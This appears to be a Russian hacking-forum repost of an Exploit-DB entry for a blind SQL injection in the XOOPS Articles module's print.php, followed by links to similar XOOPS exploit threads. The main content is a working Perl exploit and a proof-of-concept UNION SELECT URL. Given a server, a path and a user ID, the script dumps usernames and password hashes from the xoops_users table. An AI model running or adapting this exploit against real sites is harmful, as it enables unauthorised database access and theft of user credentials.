Exploit XOOPS module Articles 1.02 - 'print.php?id' SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3588
Проверка EDB
  1. Пройдено
Автор
WILDBOY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-3311
Дата публикации
2007-03-27
Код: 
#!/usr/bin/perl -w

# Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC

# Type :

# SQL Injection

# Release Date :

# {2007-03-26}

# Product / Vendor :

# http://support.sirium.net/

# Bug :

# http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0

# PoC :

# http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

# Exploit :

#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################

use IO::Socket;

if (@ARGV != 3)
{
    print "\n-----------------------------------\n";
    print "Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit\n";
    print "-----------------------------------\n";
    print "\nUniquE-Key{UniquE-Cracker}\n";
    print "UniquE[at]UniquE-Key.ORG\n";
    print "http://UniquE-Key.ORG\n";
    print "\n-----------------------------------\n";
    print "\nUsage: $0 <server> <path> <uid>\n";
    print "Examp: $0 www.victim.com /path 1\n";
    print "\n-----------------------------------\n";
    exit ();
}

$server = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort => "80");
printf $socket ("GET %s/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$server,$uid);

while(<$socket>)

{
    if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
}

# Tested :

# All Version

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org

# milw0rm.com [2007-03-27]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit XOOPS module Articles 1.03 - 'index.php?cat_id' SQL Injection
Ответы
0
Просмотры
246
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection
Ответы
0
Просмотры
505
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection
Ответы
0
Просмотры
486
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities
Ответы
0
Просмотры
436
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SmartMedia Module 0.85 Beta for XOOPS - 'categoryId' Cross-Site Scripting
Ответы
0
Просмотры
372
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Content Module 0.5 for XOOPS - 'id' SQL Injection
Ответы
0
Просмотры
378
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit tadbook2 Module for XOOPS - 'open_book.php' SQL Injection
Ответы
0
Просмотры
379
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS down.php?id' Cross-Site Scripting
Ответы
0
Просмотры
371
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS search.php?key' Cross-Site Scripting
Ответы
0
Просмотры
384
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Yogurt Social Network 3.2 rc1 Module for XOOPS - 'tribes.php?uid' Cross-Site Scripting
Ответы
0
Просмотры
385
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу